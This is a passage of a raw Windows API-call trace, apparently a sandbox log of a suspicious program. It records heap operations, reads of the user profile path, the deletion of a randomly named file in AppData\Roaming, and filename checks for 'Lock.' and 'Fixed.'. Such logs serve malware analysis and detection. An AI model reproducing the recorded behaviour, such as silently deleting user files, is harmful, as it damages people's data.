hHeap=0x970000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0228.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0228.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0228.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0228.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0228.703] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0228.703] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0228.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0228.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.704] FreeLibrary (hLibModule=0x756e0000) returned 1 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0228.704] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0228.704] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.704] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0228.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0228.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0228.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.704] CloseHandle (hObject=0x2d0) returned 1 [0228.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0228.706] CloseHandle (hObject=0x2a0) returned 1 [0228.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0228.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0228.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0228.773] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0228.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0228.773] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/E2eFopJKn6uustHoKg.pps", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\E2eFopJKn6uustHoKg.pps", lpFilePart=0x8cedf4*="E2eFopJKn6uustHoKg.pps") returned 0x36 [0228.773] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\E2eFopJKn6uustHoKg.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\e2efopjkn6uusthokg.pps")) returned 0x20 [0228.773] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\E2eFopJKn6uustHoKg.pps", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3b0440, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xf9871240, ftLastAccessTime.dwHighDateTime=0x1d5e7ea, ftLastWriteTime.dwLowDateTime=0xf9871240, ftLastWriteTime.dwHighDateTime=0x1d5e7ea, nFileSizeHigh=0x0, nFileSizeLow=0x7128, dwReserved0=0x1, dwReserved1=0x1c, cFileName="E2eFopJKn6uustHoKg.pps", cAlternateFileName="E2EFOP~1.PPS")) returned 0xa87610 [0228.774] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\E2eFopJKn6uustHoKg.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\e2efopjkn6uusthokg.pps")) returned 1 [0228.775] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3b0440, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xf9871240, ftLastAccessTime.dwHighDateTime=0x1d5e7ea, ftLastWriteTime.dwLowDateTime=0xf9871240, ftLastWriteTime.dwHighDateTime=0x1d5e7ea, nFileSizeHigh=0x0, nFileSizeLow=0x7128, dwReserved0=0x1, dwReserved1=0x1c, cFileName="E2eFopJKn6uustHoKg.pps", cAlternateFileName="E2EFOP~1.PPS")) returned 0 [0228.775] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0228.776] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0228.776] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0228.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0228.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6e) returned 0x2e564e0 [0228.777] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/E2eFopJKn6uustHoKg.pps", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\E2eFopJKn6uustHoKg.pps", lpFilePart=0x8cf650*="E2eFopJKn6uustHoKg.pps") returned 0x36 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0228.777] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\E2eFopJKn6uustHoKg.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\e2efopjkn6uusthokg.pps")) returned 0xffffffff [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0228.777] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0228.777] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.777] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0228.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0228.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0228.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0228.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0228.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0228.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0228.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EdsWI8rB4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dsWI8rB4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sWI8rB4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WI8rB4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I8rB4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8rB4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rB4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ywDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wDqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DqnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qnX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nX6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0228.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0228.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0228.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0228.779] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0228.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0228.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0228.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0228.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0228.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0228.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0228.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2f04620 [0228.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EdsWI8rB4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dsWI8rB4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sWI8rB4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WI8rB4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I8rB4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8rB4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rB4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BywDqnX6.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ywDqnX6.bmp", cchCount1=6, 